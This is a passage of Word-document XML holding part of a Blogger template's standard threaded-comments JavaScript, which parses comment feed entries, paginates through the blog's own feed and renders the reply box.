        <w:t xml:space="preserve">                                                    var id = /blog-(\d+).post-(\d+)/.exec(entry.id.$t);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                                    comment.id = id ? id[2] : null;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    comment.body = bodyFromEntry(entry);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    comment.timestamp = Date.parse(entry.published.$t) + '';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    if (entry.author &amp;&amp; entry.author.constructor === Array) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                      var auth = entry.author[0];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                      if (auth) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                        comment.author = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                          name: (auth.name ? auth.name.$t : undefined),</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                          profileUrl: (auth.uri ? auth.uri.$t : undefined),</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                          avatarUrl: (auth.gd$image ? auth.gd$image.src : undefined)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                        };</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                      }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    if (entry.link) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                      if (entry.link[2]) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                        comment.link = comment.permalink = entry.link[2].href;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                      }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                      if (entry.link[3]) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                        var pid = /.*comments\/default\/(\d+)\?.*/.exec(entry.link[3].href);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                        if (pid &amp;&amp; pid[1]) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                          comment.parentId = pid[1];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                        }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                      }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    comment.deleteclass = 'item-control blog-admin';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    if (entry.gd$extendedProperty) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                      for (var k in entry.gd$extendedProperty) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                                        if (entry.gd$extendedProperty[k].name == 'blogger.itemClass') {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                          comment.deleteclass += ' ' + entry.gd$extendedProperty[k].value;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                        } else if (entry.gd$extendedProperty[k].name == 'blogger.displayTime') {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                          comment.displayTime = entry.gd$extendedProperty[k].value;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                        }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                      }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    comments.push(comment);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                return comments;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              };</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              var paginator = function(callback) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                if (hasMore()) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  var url = config.feed + '?alt=json&amp;v=2&amp;orderby=published&amp;reverse=false&amp;max-results=50';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  if (cursor) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    url += '&amp;published-min=' + new Date(cursor).toISOString();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  window.bloggercomments = function(data) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    var parsed = parse(data);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    cursor = parsed.length &lt; 50 ? null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    : parseInt(parsed[parsed.length - 1].timestamp) + 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    callback(parsed);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    window.bloggercomments = null;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  url += '&amp;callback=bloggercomments';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                                  var script = document.createElement('script');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  script.type = 'text/javascript';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  script.src = url;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  document.getElementsByTagName('head')[0].appendChild(script);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              };</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              var hasMore = function() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                return !!cursor;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              };</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              var getMeta = function(key, comment) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                if ('iswriter' == key) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  var matches = !!comment.author</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  &amp;&amp; comment.author.name == config.authorName</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  &amp;&amp; comment.author.profileUrl == config.authorUrl;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  return matches ? 'true' : '';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                } else if ('deletelink' == key) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  return config.baseUri + '/delete-comment.g?blogID='</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  + config.blogId + '&amp;postID=' + comment.id;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                } else if ('deleteclass' == key) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  return comment.deleteclass;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                return '';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              };</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              var replybox = null;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              var replyUrlParts = null;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              var replyParent = undefined;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              var onReply = function(commentId, domId) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                                if (replybox == null) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  // lazily cache replybox, and adjust to suit this style:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  replybox = document.getElementById('comment-editor');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  if (replybox != null) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    replybox.height = '250px';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    replybox.style.display = 'block';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    replyUrlParts = replybox.src.split('#');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                if (replybox &amp;&amp; (commentId !== replyParent)) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  replybox.src = '';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  document.getElementById(domId).insertBefore(replybox, null);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  replybox.src = replyUrlParts[0]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  + (commentId ? '&amp;parentID=' + commentId : '')</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  + '#' + replyUrlParts[1];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  replyParent = commentId;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              };</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              var hash = (window.location.hash || '#').substring(1);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              var startThread, targetComment;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              if (/^comment-form_/.test(hash)) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                startThread = hash.substring('comment-form_'.length);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              } else if (/^c[0-9]+$/.test(hash)) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                targetComment = hash.substring(1);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              // Configure commenting API:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              var configJso = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                                'maxDepth': config.maxThreadDepth</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              };</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              var provider = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                'id': config.postId,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                'data': items,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                'loadNext': paginator,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                'hasMore': hasMore,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                'getMeta': getMeta,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                'onReply': onReply,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                'rendered': true,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                'initComment': targetComment,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                'initReplyThread': startThread,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                'config': configJso,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                'messages': msgs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              };</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              var render = function() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                if (window.goog &amp;&amp; window.goog.comments) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  var holder = document.getElementById('comment-holder');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  window.goog.comments.render(holder, provider);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              };</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              // render now, or queue to render when library loads:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              if (window.goog &amp;&amp; window.goog.comments) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                render();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              } else {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                window.goog = window.goog || {};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                window.goog.comments = window.goog.comments || {};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                                window.goog.comments.loadQueue = window.goog.comments.loadQueue || [];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                window.goog.comments.loadQueue.push(render);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            })();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            // ]]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;/b:includable&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;b:includable id='threaded_comments' var='post'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;div class='comments' id='comments'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;a name='comments'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;h4&gt;&lt;data:post.commentLabelFull/&gt;:&lt;/h4&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;div class='comments-content'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;b:include cond='data:post.embedCommentForm' data='post' name='threaded_comment_js'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;div id='comment-holder'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                &lt;data:post.commentHtml/&gt;</w:t>
      </w:r>
    </w:p>
